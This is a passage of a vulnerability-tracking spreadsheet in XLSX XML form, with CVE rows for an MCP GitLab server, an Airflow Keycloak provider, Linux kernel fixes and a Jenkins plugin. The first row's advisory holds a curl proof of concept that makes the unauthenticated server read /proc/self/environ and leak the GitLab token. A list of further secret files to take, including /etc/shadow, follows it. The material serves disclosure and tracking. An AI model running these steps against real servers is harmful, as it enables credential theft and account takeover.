**Docker amplification:** The `Dockerfile` has no `USER` directive, so the process runs as root. The `docker-compose.yaml` maps `3002:3002`, which binds `0.0.0.0` by default, exposing the unauthenticated endpoint to the network.
### PoC
**Prerequisites:**
- A running `@zereight/mcp-gitlab` instance with `SSE=true` and `GITLAB_PERSONAL_ACCESS_TOKEN` set (this is the default Docker deployment config)
- Network access to the server's port (default: 3002)
- A GitLab project ID the PAT has write access to (use `list_projects` to enumerate)
**Steps:**
```bash
# 1. Connect to the unauthenticated SSE endpoint and capture the session ID
SESSION_ID=$(curl -s -N http://&lt;HOST&gt;:3002/sse | head -1 | grep -oP 'sessionId=\K[^&amp;\s]+')
# 2. (Optional) Enumerate accessible projects to find a writable project ID
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 1,
    "method": "tools/call",
    "params": {
      "name": "list_projects",
      "arguments": {"owned": true}
    }
  }'
# 3. Read /proc/self/environ (contains GITLAB_PERSONAL_ACCESS_TOKEN in plaintext)
#    and upload it to a GitLab project
curl -X POST "http://&lt;HOST&gt;:3002/messages?sessionId=$SESSION_ID" \
  -H "Content-Type: application/json" \
  -d '{
    "jsonrpc": "2.0",
    "id": 2,
    "method": "tools/call",
    "params": {
      "name": "upload_markdown",
      "arguments": {
        "project_id": "&lt;WRITABLE_PROJECT_ID&gt;",
        "file_path": "/proc/self/environ"
      }
    }
  }'
# 4. The response contains a GitLab upload URL like:
#    {"markdown": "![environ](/uploads/abc123def456/environ)", "url": "/uploads/abc123def456/environ"}
#
# 5. Retrieve the uploaded file from GitLab:
curl "https://gitlab.example.com/&lt;namespace&gt;/&lt;project&gt;/uploads/abc123def456/environ"
# 6. The file contains NUL-separated environment variables including:
#    GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxxxxxxxxxxxxxxxxx
#
# 7. Use the stolen PAT for full GitLab API access:
curl -H "Private-Token: glpat-xxxxxxxxxxxxxxxxxxxx" "https://gitlab.example.com/api/v4/user"
```
**Other exfiltrable targets (running as root in Docker):**
| File | Contents |
|---|---|
| `/proc/self/environ` | All env vars including `GITLAB_PERSONAL_ACCESS_TOKEN=glpat-xxxxx` |
| `/proc/self/cmdline` | Command line args (token if passed via CLI) |
| `/etc/shadow` | System password hashes |
| `/app/build/index.js` | Full application source code |
| `~/.gitlab-mcp-token.json` | OAuth tokens (if OAuth mode was used) |
### Impact
**Unauthenticated full GitLab account takeover.** Any attacker with network access to the MCP server port can steal the Personal Access Token and gain complete access to the GitLab instance as the token owner - including all repositories, CI/CD secrets and variables, deploy keys, project settings, and admin functions if the user has admin privileges. No credentials or user interaction are required. This is the default configuration for Docker deployments</t>
        </is>
      </c>
      <c r="S298" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61560</t>
        </is>
      </c>
    </row>
    <row r="299">
      <c r="A299" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B299" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C299" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76186</t>
        </is>
      </c>
      <c r="D299" s="5" t="inlineStr"/>
      <c r="E299" s="5" t="inlineStr"/>
      <c r="F299" s="5" t="inlineStr"/>
      <c r="G299" s="5" t="inlineStr"/>
      <c r="H299" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I299" s="5" t="inlineStr"/>
      <c r="J299" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K299" s="5" t="inlineStr"/>
      <c r="L299" s="5" t="inlineStr"/>
      <c r="M299" s="5" t="inlineStr"/>
      <c r="N299" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O299" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P299" s="5" t="inlineStr"/>
      <c r="Q299" s="5" t="inlineStr">
        <is>
          <t>CWE-565</t>
        </is>
      </c>
      <c r="R299" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow Keycloak provider: from Airflow 3.3 the Keycloak auth manager takes a user's identity from the signed Airflow session token but takes the Keycloak access and refresh tokens used for every authorization decision from separate, unauthenticated cookies, and never checks that the two describe the same subject. A user who holds any valid Airflow login of their own, together with another subject's Keycloak access or refresh token obtained out of band, can pair the two: Airflow then authorizes requests with the foreign token's privileges while the session identity, audit log and cache keys continue to name the attacker's own account. The refresh path re-issues an Airflow session token for the original identity carrying the foreign tokens, so the mismatched pairing survives across sessions.
Affects deployments running Airflow 3.3 or later with the Keycloak auth manager. Earlier versions carried the Keycloak tokens inside the signed session token, so the binding existed and was lost when they moved into separate cookies.
Users of apache-airflow-providers-keycloak are recommended to upgrade to version 0.10.0 or later, which binds the cookie-supplied tokens to the session identity.</t>
        </is>
      </c>
      <c r="S299" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76186</t>
        </is>
      </c>
    </row>
    <row r="300">
      <c r="A300" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B300" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C300" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76187</t>
        </is>
      </c>
      <c r="D300" s="5" t="inlineStr"/>
      <c r="E300" s="5" t="inlineStr"/>
      <c r="F300" s="5" t="inlineStr"/>
      <c r="G300" s="5" t="inlineStr"/>
      <c r="H300" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I300" s="5" t="inlineStr"/>
      <c r="J300" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K300" s="5" t="inlineStr"/>
      <c r="L300" s="5" t="inlineStr"/>
      <c r="M300" s="5" t="inlineStr"/>
      <c r="N300" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O300" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P300" s="5" t="inlineStr"/>
      <c r="Q300" s="5" t="inlineStr">
        <is>
          <t>CWE-287</t>
        </is>
      </c>
      <c r="R300" s="5" t="inlineStr">
        <is>
          <t>Apache Airflow Keycloak provider: the unauthenticated token endpoint accepts a client-credentials grant for any confidential client registered in the Keycloak realm, not only the client configured for Airflow. No allowlist restricts which client ids may authenticate, so the credentials of an unrelated application that happens to share the realm are valid Airflow login credentials, and Airflow mints a signed session token for that application's service account. The endpoint also answers unauthenticated credential guesses against Keycloak under Airflow's identity.
Affects deployments using the Keycloak auth manager whose realm is shared with other confidential clients. The attacker needs valid credentials for any one of those clients, not for Airflow. Resource authorization is still evaluated per subject, so the access gained is whatever that service account holds, plus any endpoint gated only on being authenticated.
Users of apache-airflow-providers-keycloak are recommended to upgrade to version 0.10.0 or later, which accepts only the configured client on that grant.</t>
        </is>
      </c>
      <c r="S300" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76187</t>
        </is>
      </c>
    </row>
    <row r="301">
      <c r="A301" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B301" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C301" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89835</t>
        </is>
      </c>
      <c r="D301" s="5" t="inlineStr"/>
      <c r="E301" s="5" t="inlineStr"/>
      <c r="F301" s="5" t="inlineStr"/>
      <c r="G301" s="5" t="inlineStr"/>
      <c r="H301" s="5" t="inlineStr"/>
      <c r="I301" s="5" t="inlineStr"/>
      <c r="J301" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K301" s="5" t="inlineStr"/>
      <c r="L301" s="5" t="inlineStr"/>
      <c r="M301" s="5" t="inlineStr"/>
      <c r="N301" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O301" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P301" s="5" t="inlineStr"/>
      <c r="Q301" s="5" t="inlineStr"/>
      <c r="R301" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
f2fs: avoid NULL checkpoint thread access in sysfs
checkpoint_merge can be enabled even when no checkpoint merge thread is
running. A read-only mount is one case: f2fs does not start
f2fs_issue_ckpt there, but ckpt_thread_ioprio is still writable through
sysfs.
The ckpt_thread_ioprio store path updates the saved ioprio value and,
when checkpoint_merge is enabled, calls set_task_ioprio() for the
checkpoint thread. If cprc-&gt;f2fs_issue_ckpt is NULL, that dereferences a
NULL task pointer.
Protect ckpt_thread_ioprio sysfs writes with s_umount as well, so the
checkpoint thread cannot disappear under the store path while updating
its ioprio.</t>
        </is>
      </c>
      <c r="S301" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89835</t>
        </is>
      </c>
    </row>
    <row r="302">
      <c r="A302" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B302" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C302" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89953</t>
        </is>
      </c>
      <c r="D302" s="5" t="inlineStr"/>
      <c r="E302" s="5" t="inlineStr"/>
      <c r="F302" s="5" t="inlineStr"/>
      <c r="G302" s="5" t="inlineStr"/>
      <c r="H302" s="5" t="inlineStr"/>
      <c r="I302" s="5" t="inlineStr"/>
      <c r="J302" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K302" s="5" t="inlineStr"/>
      <c r="L302" s="5" t="inlineStr"/>
      <c r="M302" s="5" t="inlineStr"/>
      <c r="N302" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O302" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P302" s="5" t="inlineStr"/>
      <c r="Q302" s="5" t="inlineStr"/>
      <c r="R302" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mtd: mtdoops: free page bitmap when the backing MTD is removed
mtdoops_notify_add() allocates oops_page_used when the configured MTD
device is registered.  mtdoops_notify_remove() detaches from that device
but leaves the bitmap allocated.  If the same MTD device is later
registered again, the add path allocates a new bitmap and overwrites the
old pointer, leaking one vmalloc allocation per remove/add cycle.
This is only visible when the backing MTD device can disappear and be
registered again while mtdoops remains loaded, so the usual static MTD
case does not expose it.
Free the bitmap after unregistering the dumper and flushing the pending
workers, then clear the pointer and page count before a later attach can
allocate fresh state.  Clearing the pointer also keeps the module exit
path from freeing the same bitmap a second time after a remove event.</t>
        </is>
      </c>
      <c r="S302" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89953</t>
        </is>
      </c>
    </row>
    <row r="303">
      <c r="A303" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B303" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C303" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-90040</t>
        </is>
      </c>
      <c r="D303" s="5" t="inlineStr"/>
      <c r="E303" s="5" t="inlineStr"/>
      <c r="F303" s="5" t="inlineStr"/>
      <c r="G303" s="5" t="inlineStr"/>
      <c r="H303" s="5" t="inlineStr"/>
      <c r="I303" s="5" t="inlineStr"/>
      <c r="J303" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K303" s="5" t="inlineStr"/>
      <c r="L303" s="5" t="inlineStr"/>
      <c r="M303" s="5" t="inlineStr"/>
      <c r="N303" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O303" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P303" s="5" t="inlineStr"/>
      <c r="Q303" s="5" t="inlineStr"/>
      <c r="R303" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
KVM: SEV: Forcefully invalidate SNP VMSA if its backing gmem page is zapped
Wire up a gmem_invalidate_range() call for SNP VMs, and use it to force
vCPUs to reload/recheck their guest-provided VMSA if the backing gmem
page is being invalidated, e.g. is being PUNCH_HOLE'd.  Use the same core
logic to handle invalidations as VMX does for the APIC-access page, as the
two concepts are nearly identical: shove the physical address of a page
into the vCPU's control structure:
 1. Snapshot the invalidation sequence counter
 2. Grab the pfn (from guest_memfd in this case)
 3. Acquire mmu_lock for read
 4. Re-request reload if retry is needed, otherwise commit the change.
Note, the re-request action in #4 is necessary as KVM's retry logic is
fuzzy, i.e. can get false positives.  If the guest_memfd page has been
dropped, at some point a subsequent reload will fail to get a PFN from
guest_memfd, and KVM will fail KVM_RUN.  If the retry was due to a false
positive, KVM will retry until there are no relevant MMU notifier events
(and will retry in the "outer" loop, i.e. will drop locks and resched as
needed).
Note #2!  Take care to invalidate the VMSA when a relevant memslot is
DELETED or MOVED, as invalidations in response to PUNCH_HOLE are predicated
on memslot bindings (KVM doesn't know what GFN range(s) to invalidate
without a binding).  And more importantly, the VMSA mapping requires a
memslot, i.e. must be invalidated if its memslots disappears, regardless of
the state of the underlying guest_memfd inode.
Failure to invalidate the vCPU's control.vmsa_pa (which is checked by
pre_sev_run()) can prevent KVM from properly freeing the page as firmware
will reject the RMPUPDATE to reclaim the page with FAIL_INUSE if the vCPU
is actively running, i.e. if VMSA page is in-use.  That in turn leads to an
RMP #PF on the next use, as the page will still be assigned to the SNP VM.
  SEV-SNP: RMPUPDATE failed for PFN 78d198, pg_level: 1, ret: 3
  SEV-SNP: PFN 0x78d198, RMP entry: [0xfff0000000144001 - 0x000000000000000f]
  CPU: 3 UID: 0 PID: 31345 Comm: sev_snp_vmsa_pu Tainted: G     U     O
  Tainted: [U]=USER, [O]=OOT_MODULE
  Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.86.0-102 01/25/2026
  Call Trace:
   &lt;TASK&gt;
   dump_stack_lvl+0x54/0x70
   rmpupdate+0x12c/0x140
   rmp_make_shared+0x3b/0x60
   sev_gmem_invalidate+0xe0/0x170 [kvm_amd]
   delete_from_page_cache_batch+0x1d8/0x220
   truncate_inode_pages_range+0x120/0x3d0
   kvm_gmem_fallocate+0x19a/0x270 [kvm]
   vfs_fallocate+0x1bc/0x1f0
   __x64_sys_fallocate+0x48/0x70
   do_syscall_64+0x10a/0x480
   entry_SYSCALL_64_after_hwframe+0x4b/0x53
  RIP: 0033:0x496c7e
   &lt;/TASK&gt;
  ------------[ cut here ]------------
  SEV: Failed to update RMP entry for PFN 0x78d198 error -14
  WARNING: arch/x86/kvm/svm/sev.c:5160 at sev_gmem_invalidate+0x126/0x170 [kvm_amd], CPU#3: sev_snp_vmsa_pu/31345
  CPU: 3 UID: 0 PID: 31345 Comm: sev_snp_vmsa_pu Tainted: G     U     O
  Tainted: [U]=USER, [O]=OOT_MODULE
  Hardware name: Google, Inc. Arcadia_IT_80/Arcadia_IT_80, BIOS 34.86.0-102 01/25/2026
  RIP: 0010:sev_gmem_invalidate+0x12b/0x170 [kvm_amd]
  Call Trace:
   &lt;TASK&gt;
   delete_from_page_cache_batch+0x1d8/0x220
   truncate_inode_pages_range+0x120/0x3d0
   kvm_gmem_fallocate+0x19a/0x270 [kvm]
   vfs_fallocate+0x1bc/0x1f0
   __x64_sys_fallocate+0x48/0x70
   do_syscall_64+0x10a/0x480
   entry_SYSCALL_64_after_hwframe+0x4b/0x53
  RIP: 0033:0x496c7e
   &lt;/TASK&gt;
  irq event stamp: 20689
  hardirqs last  enabled at (20699): [&lt;ffffffff8e76092c&gt;] __console_unlock+0x5c/0x60
  hardirqs last disabled at (20708): [&lt;ffffffff8e760911&gt;] __console_unlock+0x41/0x60
  softirqs last  enabled at (20722): [&lt;ffffffff8e6cd74e&gt;] __irq_exit_rcu+0x7e/0x140
  softirqs last disabled at (20717): [&lt;ffffffff8e6cd74e&gt;] __irq_exit_rcu+0x7e/0x140
  ---[ end trace 0000000000000000 ]---
  BUG: unable to handle page fault for address: ffff99
---truncated---</t>
        </is>
      </c>
      <c r="S303" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-90040</t>
        </is>
      </c>
    </row>
    <row r="304">
      <c r="A304" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B304" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C304" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92126</t>
        </is>
      </c>
      <c r="D304" s="5" t="inlineStr"/>
      <c r="E304" s="5" t="inlineStr"/>
      <c r="F304" s="5" t="inlineStr"/>
      <c r="G304" s="5" t="inlineStr"/>
      <c r="H304" s="5" t="inlineStr"/>
      <c r="I304" s="5" t="inlineStr"/>
      <c r="J304" s="5" t="inlineStr">
        <is>
          <t>jenkins</t>
        </is>
      </c>
      <c r="K304" s="5" t="inlineStr"/>
      <c r="L304" s="5" t="inlineStr"/>
      <c r="M304" s="5" t="inlineStr"/>
      <c r="N304" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O304" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P304" s="5" t="inlineStr"/>
      <c r="Q304" s="5" t="inlineStr"/>
      <c r="R304" s="5" t="inlineStr">
        <is>
          <t>Jenkins Script Security Plugin 1415.v9a_f9b_3a_c253d and earlier does not reject @Builder annotations whose builderStrategy member names an arbitrary class, allowing attackers with permission to define and run sandboxed scripts, including Pipelines, to execute code outside the sandbox if a suitable class is present on the classpath of the component that evaluates the script.</t>
        </is>
      </c>
      <c r="S304" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92126</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:S304"/>
  <conditionalFormatting sqref="E2:E304">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304">
    <cfRule type="cellIs" priority="5" operator="equal" dxfId="4">
      <formula>"Yes"</formula>
    </cfRule>
  </conditionalFormatting>
  <hyperlinks>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S2" r:id="rId1"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S3" r:id="rId2"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S4" r:id="rId3"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S5" r:id="rId4"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S6" r:id="rId5"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S7" r:id="rId6"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S8" r:id="rId7"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S9" r:id="rId8"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S10" r:id="rId9"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S11" r:id="rId10"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S12" r:id="rId11"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S13" r:id="rId12"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S14" r:id="rId13"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S15" r:id="rId14"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S16" r:id="rId15"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S17" r:id="rId16"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S18" r:id="rId17"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S19" r:id="rId18"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S20" r:id="rId19"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S21" r:id="rId20"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S22" r:id="rId21"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S23" r:id="rId22"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S24" r:id="rId23"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S25" r:id="rId24"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S26" r:id="rId25"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S27" r:id="rId26"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S28" r:id="rId27"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S29" r:id="rId28"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S30" r:id="rId29"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S31" r:id="rId30"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S32" r:id="rId31"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S33" r:id="rId32"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S34" r:id="rId33"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S35" r:id="rId34"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S36" r:id="rId35"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S37" r:id="rId36"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S38" r:id="rId37"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S39" r:id="rId38"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S40" r:id="rId39"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S41" r:id="rId40"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S42" r:id="rId41"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S43" r:id="rId42"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S44" r:id="rId43"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S45" r:id="rId44"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S46" r:id="rId45"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S47" r:id="rId46"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S48" r:id="rId47"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S49" r:id="rId48"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S50" r:id="rId49"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S51" r:id="rId50"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S52" r:id="rId51"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S53" r:id="rId52"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S54" r:id="rId53"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S55" r:id="rId54"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S56" r:id="rId55"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S57" r:id="rId56"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S58" r:id="rId57"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S59" r:id="rId58"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S60" r:id="rId59"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S61" r:id="rId60"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S62" r:id="rId61"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S63" r:id="rId62"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S64" r:id="rId63"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S65" r:id="rId64"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S66" r:id="rId65"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S67" r:id="rId66"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S68" r:id="rId67"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S69" r:id="rId68"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S70" r:id="rId69"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S71" r:id="rId70"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S72" r:id="rId71"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S73" r:id="rId72"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S74" r:id="rId73"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S75" r:id="rId74"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S76" r:id="rId75"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S77" r:id="rId76"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S78" r:id="rId77"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S79" r:id="rId78"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S80" r:id="rId79"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S81" r:id="rId80"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S82" r:id="rId81"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S83" r:id="rId82"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S84" r:id="rId83"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S85" r:id="rId84"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S86" r:id="rId85"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S87" r:id="rId86"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S88" r:id="rId87"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S89" r:id="rId88"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S90" r:id="rId89"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S91" r:id="rId90"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S92" r:id="rId91"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S93" r:id="rId92"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S94" r:id="rId93"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S95" r:id="rId94"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S96" r:id="rId95"/>
    <hyperlink xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" ref="S97" r:id="rId96"/>
